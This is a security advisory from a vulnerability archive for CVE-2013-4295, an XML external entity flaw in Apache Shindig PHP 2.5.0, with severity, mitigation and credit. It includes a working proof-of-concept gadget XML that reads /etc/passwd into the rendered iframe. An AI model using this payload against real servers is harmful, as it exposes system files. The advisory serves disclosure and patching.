Apache Shindig 2.5.0 XXE Injection

2013-10-22T00:00:00
ID PACKETSTORM:123724
Type packetstorm
Reporter Kousuke Ebihara
Modified 2013-10-22T00:00:00

Description

                                        
                                            `CVE-2013-4295: XXE vulnerability In Apache Shindig 2.5.0 (PHP)  
  
Severity: Important  
  
Vendor: The Apache Software Foundation  
  
Versions Affected: Apache Shindig PHP 2.5.0  
  
Description: The gadget renderer in the PHP version of Apache Shindig  
is subject to an XML External Entity (XXE) Injection attack. The  
vulnerability allows a malicious gadget author to construct paths to  
content on the gadget rendering server which in turn will display the  
content in the gadget iframe.  
  
Mitigation: 2.5.0 users should upgrade to 2.5.0-update1.  
  
Example: The following gadget XML demonstrates the issue.  
  
<?xml version="1.0" encoding="UTF-8"?>  
<!DOCTYPE Module [ <!ENTITY passwd SYSTEM "file:///etc/passwd"> ]>  
<Module>  
<ModulePrefs title="Test Application">  
<Require feature="opensocial-0.9" />  
</ModulePrefs>  
<Content type="html">  
&passwd; hello  
</Content>  
</Module>  
  
After rendering this gadget you will see the content of /etc/passwd in  
the gadget iframe.  
  
Credit: This issue was discovered by Kousuke Ebihara.  
  
References: http://shindig.apache.org/security.html  
`